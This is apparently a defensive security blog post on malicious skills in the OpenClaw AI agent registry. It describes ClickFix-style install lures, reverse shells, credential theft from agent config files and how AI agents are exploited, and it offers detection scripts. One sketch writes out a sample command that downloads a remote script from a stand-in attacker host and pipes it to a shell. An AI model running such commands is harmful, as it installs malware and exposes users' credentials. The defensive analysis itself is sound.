
OpenClaw Malicious Skills: What Security Teams Must Know

OpenClaw, an open-source AI agent framework. Photo by Immo Wegmann / Unsplash

Nearly 900 malicious skills have been identified on ClawHub, the public registry for the OpenClaw AI agent framework (Bitdefender, 2026). That is roughly 20% of all packages in the ecosystem. A separate audit by Koi Security found 341 confirmed malicious entries across multiple campaigns, with the majority delivering Atomic Stealer (AMOS) to macOS systems (Koi Security, 2026).

If your organisation has employees running AI agents on corporate devices (and statistically it does), this is not just another registry poisoning story. Think of it as the npm supply chain problem with system-level permissions bolted on.

Get threat intelligence like this delivered to your inbox. Subscribe to CyberDesserts for practical security insights, no fluff.

What Is OpenClaw?

OpenClaw (formerly known as Clawdbot and Moltbot) is an open-source AI agent framework that crossed 160,000 GitHub stars and 2 million visitors in a single week in early 2026 (Bitdefender, 2026). Users install "skills" from ClawHub, a community registry, to extend what the agent can do: manage files, run terminal commands, query APIs, automate workflows.

The design philosophy prioritises capability over containment. OpenClaw agents typically operate with broad system permissions, including terminal access and full disk access, so they can actually execute tasks on the user's behalf. That permission model is the entire point of the tool. It is also the entire problem.

When a malicious skill gets loaded, it inherits those same system-wide permissions. One bad package gives an attacker the same access the agent itself has.

Same Playbook, Higher Stakes

If you have followed the npm supply chain attacks over the past year, the ClawHub attack patterns will look painfully familiar.

Typosquatting is already in play. Bitdefender identified the handle "aslaep123" mimicking the legitimate user "asleep123" to trick users into trusting malicious skills. The Shai-Hulud npm attack used the same technique to compromise over 796 packages in September 2025.

Registry poisoning at scale mirrors the npm ecosystem's struggles. A single ClawHub user, "hightower6eu," uploaded 354 malicious packages in an automated blitz (Bitdefender, 2026). VirusTotal has now analysed over 3,000 OpenClaw skills and found hundreds with malicious characteristics (VirusTotal, 2026).

Social engineering through install instructions follows the ClickFix pattern. The dominant campaign, codenamed ClawHavoc, uses fake error messages and verification requirements to trick users into pasting base64-encoded commands into their terminal. The technique is identical to the clipboard hijacking attacks that have been escalating across the broader threat landscape.
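The ClickFix pattern works because the payload is unreadable at a glance. A minimal Python sketch of the defensive counter-move, decoding any base64 blob before it goes anywhere near a terminal; the URL in the example is a hypothetical stand-in, not a real indicator:

```python
import base64

def decode_suspect_command(blob: str) -> str:
    """Decode a base64-encoded command so it can be read before it is run.
    Invalid base64 raises an exception, which is itself a signal to stop."""
    return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")

# Benign stand-in resembling what a ClawHavoc-style prompt hides;
# attacker.example is a placeholder, not an actual indicator of compromise.
blob = base64.b64encode(b"curl -fsSL https://attacker.example/install | sh").decode()
print(decode_suspect_command(blob))
```

Anything that decodes to a curl-pipe-to-shell one-liner should end the "verification" process on the spot.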

The critical difference is privilege. A compromised npm package runs code in the context of a Node.js process. A compromised OpenClaw skill runs code with whatever permissions the AI agent has been granted. In most deployments, that means terminal access, file system access, and stored API keys for services like OpenAI, Anthropic, and AWS.

Palo Alto Networks' Unit 42 described it well: OpenClaw combines access to private data, exposure to untrusted content, and the ability to communicate externally. Security researcher Simon Willison calls that combination the "lethal trifecta", the design-level weakness that makes AI agents exploitable (Palo Alto Networks, 2026).

Four Attack Patterns Targeting Enterprises

Bitdefender's research identified four distinct campaigns. Each takes a different approach to execution.

  • ClawHavoc (300+ skills): Social engineering via fake error messages. Users paste a base64-encoded command that downloads Atomic Stealer. Exfiltrates credentials, browser data, and crypto wallets.
  • AuthTool: Payload stays dormant until the user issues a specific prompt. A skill posing as a Polymarket data tool establishes a persistent reverse shell when triggered by a natural language query.
  • Hidden Backdoor: Executes during skill installation by displaying a fake "Apple Software Update" message while silently establishing an encrypted tunnel to the attacker's infrastructure.
  • Credential Exfiltration: Targets OpenClaw's own configuration files at ~/.clawdbot/.env, harvesting plain-text API keys for cloud services and AI platforms.
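The fourth pattern is worth checking for on any endpoint where the agent turns up. A hedged Python sketch that reports the names (never the values) of credential-like entries in the agent's plain-text config; the variable-name heuristic is an assumption for illustration, not a documented OpenClaw format:

```python
import re
import stat
from pathlib import Path

ENV_PATH = Path.home() / ".clawdbot" / ".env"  # path cited in the Bitdefender research
CRED_RE = re.compile(r"^([A-Z0-9_]*(?:KEY|TOKEN|SECRET)[A-Z0-9_]*)=", re.MULTILINE)

def find_credential_names(text: str) -> list[str]:
    """Return the names (not the values) of credential-like entries."""
    return [m.group(1) for m in CRED_RE.finditer(text)]

def audit_env_file(path: Path = ENV_PATH) -> list[str]:
    """Flag credential entries, plus over-broad file permissions, for rotation and review."""
    if not path.exists():
        return []
    findings = find_credential_names(path.read_text())
    mode = stat.S_IMODE(path.stat().st_mode)
    if mode & 0o077:  # group- or world-readable secrets file
        findings.append(f"PERMISSIONS: {oct(mode)}")
    return findings
```

Any key this surfaces should be treated as exposed and rotated, not merely re-secured on disk.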

The AuthTool campaign is particularly concerning for enterprise environments. The malware activates only when the user interacts with the agent naturally. Traditional static analysis of the skill's code would not flag it because the malicious function sits inside an otherwise legitimate script.

Shadow AI Makes This an Enterprise Problem

Bitdefender's telemetry, drawn specifically from business environments, confirms what most security teams suspect: employees are deploying OpenClaw on corporate devices using single-line install commands. No approval process. No security review. No visibility for the SOC.

This is Shadow AI in its most dangerous form. The AI Acceptable Use Policy guide covers why governance matters here, but the short version is this: 63% of organisations that experienced AI-related breaches lacked AI governance policies (IBM, 2025). OpenClaw on a managed endpoint with broad permissions and a malicious skill installed is not a hypothetical risk. Bitdefender is seeing it in production.

What Security Teams Should Do Now

1. Discover and inventory. Run an endpoint query to find OpenClaw installations. Bitdefender recommends using osquery:

SELECT pid, name, path, cmdline FROM processes WHERE name LIKE '%openclaw%';

Treat any discovery as a potential incident requiring investigation.
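That query can be wrapped in a small script for fleet-wide sweeps. A sketch, assuming osqueryi is on the PATH; the filtering helper is deliberately pure so it can be tested without osquery installed:

```python
import json
import shutil
import subprocess

QUERY = ("SELECT pid, name, path, cmdline FROM processes "
         "WHERE name LIKE '%openclaw%';")

def flag_agent_processes(rows: list[dict]) -> list[dict]:
    """Keep rows whose process name mentions the agent; pure and testable."""
    return [r for r in rows if "openclaw" in str(r.get("name", "")).lower()]

def discover() -> list[dict]:
    """Run osquery if available; treat any non-empty result as a potential incident."""
    if shutil.which("osqueryi") is None:
        return []  # no osquery on this host; fall back to your EDR's process inventory
    out = subprocess.run(["osqueryi", "--json", QUERY],
                         capture_output=True, text=True, check=True).stdout
    return flag_agent_processes(json.loads(out))
```

Name matching alone will miss renamed binaries, so pair this with path- and hash-based detection where your tooling allows it.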

2. Update your AI Acceptable Use Policy. If your policy does not explicitly address locally installed AI agent frameworks, it has a gap. OpenClaw is different from browser-based AI tools because it executes code directly on the host operating system.

3. Block or monitor ClawHub traffic. Add ClawHub domains to your web proxy monitoring. If outright blocking is too aggressive for your environment, at minimum alert on downloads from the registry so your security team has visibility.
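Until a proper proxy rule ships, this step can be approximated with a log-matching pass. A sketch; the watchlist entry is a placeholder, since the registry's real domains should come from current threat intelligence:

```python
WATCHLIST = {"clawhub.example"}  # placeholder; substitute the registry's actual domains

def registry_hits(log_lines: list[str], watchlist: set[str] = WATCHLIST) -> list[str]:
    """Return proxy log lines that touch a watched registry domain."""
    return [line for line in log_lines
            if any(domain in line for domain in watchlist)]
```

Feed the output to your SIEM as an alert, not a block, if visibility is all your environment can tolerate for now.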

4. Treat this like any supply chain risk. The same principles that protect your npm dependencies apply here: vet packages before installation, monitor for unexpected network connections, rotate any credentials that may have been exposed.

5. Brief your teams. The social engineering in these campaigns is effective precisely because users trust their AI assistant. A skill that says "run this command to fix a compatibility issue" feels different from a phishing email, but the outcome is identical.

Summary

OpenClaw's malicious skills problem is not new in principle. Registry poisoning, typosquatting, and social engineering through install instructions have plagued npm, PyPI, and every other package ecosystem for years. What makes this different is the permission model. AI agents that can read files, execute terminal commands, and access credentials create an attack surface that traditional package managers never had.

For security teams, this is a concrete example of why AI security governance needs to extend beyond chatbot policies to cover locally installed agent frameworks. The threat is not theoretical. Bitdefender is already seeing it in enterprise telemetry.

Discover, inventory, and set policy now. The next ClawHub campaign is probably already being uploaded.

AI agent security is evolving weekly. Subscribers get notified when new threats emerge, plus practical security content covering tools, frameworks, and hands-on techniques. No sales pitches, no fluff.


Last updated: February 2026

References and Sources

  1. Bitdefender Labs (Zugec, M.). (2026). Technical Advisory: OpenClaw Exploitation in Enterprise Networks. Analysis of ~400 malicious ClawHub packages across four attack campaigns. Nearly 900 malicious skills identified via AI Skills Checker.
  2. Koi Security (Yomtov, O.). (2026). ClawHub Malicious Skills Audit. Security audit of 2,857 ClawHub skills identified 341 malicious entries, 335 tied to the ClawHavoc campaign delivering Atomic Stealer.
  3. VirusTotal. (2026). From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized. Analysis of 3,016+ OpenClaw skills with hundreds showing malicious characteristics. Single user "hightower6eu" linked to 314+ malicious packages.
  4. Snyk. (2026). From SKILL.md to Shell Access in Three Lines of Markdown. Analysis of the "lethal trifecta" risk model for AI agent skills, referencing Simon Willison's framework.
  5. Palo Alto Networks. (2026). OpenClaw threat analysis referencing "lethal trifecta" of AI agent risks: private data access, untrusted content exposure, and external communication capability.
  6. IBM Security. (2025). Cost of a Data Breach Report 2025. 63% of breached organisations lacked AI governance policies. Shadow AI in 20% of breaches added $670,000 to costs.
  7. OpenSourceMalware (McCarty, P. / 6mile). (2026). Reporting on ClawHavoc campaign targeting OpenClaw and Claude Code users, January 27 to February 2, 2026. All skills shared C2 infrastructure at 91.92.242[.]30.